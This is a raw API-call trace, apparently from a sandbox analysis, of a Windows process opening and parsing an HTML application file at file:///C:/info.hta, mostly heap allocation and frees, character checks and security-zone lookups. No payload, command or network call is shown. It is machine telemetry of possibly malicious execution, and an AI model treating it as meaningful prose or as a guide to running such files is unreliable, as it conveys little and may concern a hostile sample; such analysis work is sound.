(in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.826] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.827] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cb6d8 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cb5d8 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.828] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cb560 | out: hHeap=0x590000) returned 1 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bddb8 | out: hHeap=0x590000) returned 1 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cb520 | out: hHeap=0x590000) returned 1 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5cf6c0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x70) returned 0x5ca408 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf8) returned 0x5fd500 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8b4) returned 0x5cb520 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bddb8 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdda0 [0226.829] IsCharSpaceW (wch=0x48) returned 0 [0226.829] IsCharAlphaNumericW (ch=0x5c) returned 0 [0226.829] IsCharSpaceW (wch=0x5c) returned 0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5b34a0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce310 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3440 [0226.829] IsCharSpaceW (wch=0x41) returned 0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5bde00 [0226.829] IsCharAlphaNumericW (ch=0x20) returned 0 [0226.829] IsCharSpaceW (wch=0x20) returned 1 [0226.829] IsCharSpaceW (wch=0x7b) returned 0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c42f8 [0226.829] IsCharSpaceW (wch=0x20) returned 1 [0226.829] IsCharAlphaNumericW (ch=0x7b) returned 0 [0226.829] IsCharSpaceW (wch=0x62) returned 0 [0226.829] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ce310 | out: hHeap=0x590000) returned 1 [0226.829] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.829] IsCharSpaceW (wch=0x3a) returned 0 [0226.829] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5c42d0 [0226.829] IsCharAlphaNumericW (ch=0x3a) returned 0 [0226.829] IsCharSpaceW (wch=0x75) returned 0 [0226.830] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.830] IsCharSpaceW (wch=0x28) returned 0 [0226.830] IsCharAlphaNumericW (ch=0x28) returned 0 [0226.830] IsCharSpaceW (wch=0x23) returned 0 [0226.830] IsCharSpaceW (wch=0x23) returned 0 [0226.830] IsCharSpaceW (wch=0x7d) returned 0 [0226.830] IsCharAlphaNumericW (ch=0x7d) returned 0 [0226.830] IsCharSpaceW (wch=0x29) returned 0 [0226.830] IsCharSpaceW (wch=0x75) returned 0 [0226.830] IsCharSpaceW (wch=0x75) returned 0 [0226.830] IsCharSpaceW (wch=0x29) returned 0 [0226.830] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x14) returned 0x5b3460 [0226.830] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x34) returned 0x5cf7c0 [0226.830] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a3fc0 [0226.830] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bdde8 [0226.830] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5bddd0 [0226.830] CoTaskMemFree (pv=0x5eaa38) [0226.830] CoTaskMemFree (pv=0x5fd6d0) [0226.843] IUnknown:Release (This=0x5bbbac) returned 0xa [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.843] IUnknown:Release (This=0x5bbbac) returned 0x9 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d23c0 | out: hHeap=0x590000) returned 1 [0226.844] IUnknown:Release (This=0x5bbbac) returned 0x8 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad850 | out: hHeap=0x590000) returned 1 [0226.844] IUnknown:Release (This=0x5bbbac) returned 0x7 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d1360 | out: hHeap=0x590000) returned 1 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d15c0 | out: hHeap=0x590000) returned 1 [0226.844] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ee084 | out: ppURI=0x1ee084*=0x5bbf0c) returned 0x0 [0226.844] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ee05c | out: ppvObject=0x1ee05c*=0x5bbf0c) returned 0x0 [0226.844] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.844] IUnknown:AddRef (This=0x5bbf0c) returned 0xc [0226.844] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5ad008 [0226.844] IUnknown:Release (This=0x5bbf0c) returned 0xb [0226.844] IUnknown:Release (This=0x5bbf0c) returned 0xa [0226.844] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x100) returned 0x5cbde0 [0226.844] FindResourceW (hModule=0x71da0000, lpName=0x1fe, lpType=0x6) returned 0x2e684d0 [0226.844] LoadResource (hModule=0x71da0000, hResInfo=0x2e684d0) returned 0x2e8e53c [0226.844] LockResource (hResData=0x2e8e53c) returned 0x2e8e53c [0226.844] VirtualQuery (in: lpAddress=0x2e8e53c, lpBuffer=0x1ef22c, dwLength=0x1c | out: lpBuffer=0x1ef22c*(BaseAddress=0x2e8e000, AllocationBase=0x2bb0000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0226.844] SizeofResource (hModule=0x71da0000, hResInfo=0x2e684d0) returned 0xe6 [0226.844] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad008 | out: hHeap=0x590000) returned 1 [0226.844] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5cbde0, Size=0x46) returned 0x5cbde0 [0226.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4a) returned 0x5cdfa0 [0226.845] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef3e8 | out: ppu=0x1ef3e8) returned 0x0 [0226.845] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.845] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.845] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.845] StrCmpNICW (lpStr1="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.845] StrStrIW (lpFirst="", lpSrch="http://www.w3.org/TR/REC-html40/strict.dtd") returned 0x0 [0226.845] StrStrIW (lpFirst="", lpSrch="DTD XHTML") returned 0x0 [0226.845] StrStrIW (lpFirst="", lpSrch="DTD HTML 4") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.845] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.845] StrStrIW (lpFirst="", lpSrch="DTD XHTML 1.0") returned 0x0 [0226.845] StrStrIW (lpFirst="", lpSrch="DTD HTML 4.0") returned="DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'>" [0226.845] StrStrIW (lpFirst="", lpSrch="http://") returned="http://www.w3.org/TR/html4/strict.dtd'>" [0226.845] StrStrIW (lpFirst="", lpSrch=" Transitional//") returned 0x0 [0226.845] StrStrIW (lpFirst="", lpSrch=" Frameset//") returned 0x0 [0226.845] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5d0c40 | out: hHeap=0x590000) returned 1 [0226.845] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x34) returned 0x5cf800 [0226.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce418 [0226.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf158 [0226.846] GetTickCount () returned 0x209ee [0226.846] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.846] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce310 [0226.846] IUnknown:AddRef (This=0x5bc0bc) returned 0x3 [0226.846] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef3d4, dwFlags=0x0 | out: pdwZone=0x1ef3d4*=0xffffffff) returned 0x800c0011 [0226.846] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.846] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.846] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0226.846] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x2106, pPolicy=0x1ef3d8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x1ef3d8*=0x0) returned 0x0 [0226.846] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0226.846] IUnknown:Release (This=0x5bc0bc) returned 0x2 [0226.846] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf158 | out: hHeap=0x590000) returned 1 [0226.846] GetTickCount () returned 0x209ee [0226.846] GetTickCount () returned 0x209ee [0226.846] GetCurrentThreadId () returned 0x36c [0226.846] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad850 | out: hHeap=0x590000) returned 1 [0226.846] GetCurrentThreadId () returned 0x36c [0226.846] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cf158 | out: hHeap=0x590000) returned 1 [0226.847] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ce5d0 | out: hHeap=0x590000) returned 1 [0226.847] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e1c00 | out: hHeap=0x590000) returned 1 [0226.847] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.847] GetTickCount () returned 0x209ee [0226.847] GetTickCount () returned 0x209ee [0226.889] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc) returned 0x5cf158 [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x604370 [0226.889] StrCmpNICW (lpStr1="on", lpStr2="Sy", nChar=2) returned -4 [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2a) returned 0x5ad850 [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x5db5e8 [0226.889] StrCmpNICW (lpStr1="on", lpStr2="SI", nChar=2) returned -4 [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x16) returned 0x5b34c0 [0226.889] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5ffda0 [0226.889] StrCmpNICW (lpStr1="on", lpStr2="IC", nChar=2) returned 6 [0226.889] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0226.889] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0226.889] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0226.889] StrCmpICW (pszStr1="APPLICATION", pszStr2="APPLICATION") returned 0 [0226.954] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5ce5d0 [0226.954] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf0e0 [0226.954] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0226.954] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x50) returned 0x5ce520 [0226.954] IsCharSpaceW (wch=0x75) returned 0 [0226.954] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0226.954] IsCharSpaceW (wch=0x28) returned 0 [0226.954] IsCharSpaceW (wch=0x23) returned 0 [0226.954] IsCharSpaceW (wch=0x23) returned 0 [0226.954] IsCharSpaceW (wch=0x64) returned 0 [0226.954] IsCharSpaceW (wch=0x65) returned 0 [0226.954] IsCharSpaceW (wch=0x66) returned 0 [0226.954] IsCharSpaceW (wch=0x61) returned 0 [0226.954] IsCharSpaceW (wch=0x75) returned 0 [0226.954] IsCharSpaceW (wch=0x6c) returned 0 [0226.954] IsCharSpaceW (wch=0x74) returned 0 [0226.954] IsCharSpaceW (wch=0x23) returned 0 [0226.955] IsCharSpaceW (wch=0x41) returned 0 [0226.955] IsCharSpaceW (wch=0x50) returned 0 [0226.955] IsCharSpaceW (wch=0x50) returned 0 [0226.955] IsCharSpaceW (wch=0x4c) returned 0 [0226.955] IsCharSpaceW (wch=0x49) returned 0 [0226.955] IsCharSpaceW (wch=0x43) returned 0 [0226.955] IsCharSpaceW (wch=0x41) returned 0 [0226.955] IsCharSpaceW (wch=0x54) returned 0 